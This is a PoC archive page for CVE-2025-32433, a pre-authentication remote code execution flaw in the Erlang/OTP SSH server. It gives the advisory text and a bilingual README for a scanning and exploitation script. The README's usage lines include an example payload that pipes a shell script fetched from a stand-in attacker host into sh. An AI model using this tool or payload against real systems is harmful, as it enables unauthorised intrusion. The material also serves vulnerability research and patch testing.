Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Source
Associated Vulnerability
Title:Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description:Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
Description
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling
Readme
## VIETNAMESE ##
- ## Cách sử dụng ##

- Quét một IP:

>python3 elaina_cve2025_32433.py --target 192.168.1.10

- Quét nhiều IP từ file:
>python3 elaina_cve2025_32433.py --file targets.txt

- Khai thác nếu phát hiện lỗ hổng:

>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit

- Tùy chọn payload:

>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"

- Xuất ra JSON:

>python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json

## ENGLISH ##
- ## How to use ##
- Scan single IP:
python3 elaina_cve2025_32433.py --target 192.168.1.10

- Scan multiple IPs from file:

>python3 elaina_cve2025_32433.py --file targets.txt

- Exploit if vulnerability is found:

>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit

- Payload options:

>python3 elaina_cve2025_32433.py --target 192.168.1.10 --exploit --payload "curl http://attacker:9001/shell.sh | sh"

- Output to JSON:

>python3 elaina_cve2025_32433.py --file targets.txt --json-output scan_result.json
File Snapshot

[4.0K] /data/pocs/06d329b4c7e7cfe1e6f90a1bb01548666fb849b8 ├── [3.1K] elaina_cve2025_32433.py └── [1.1K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →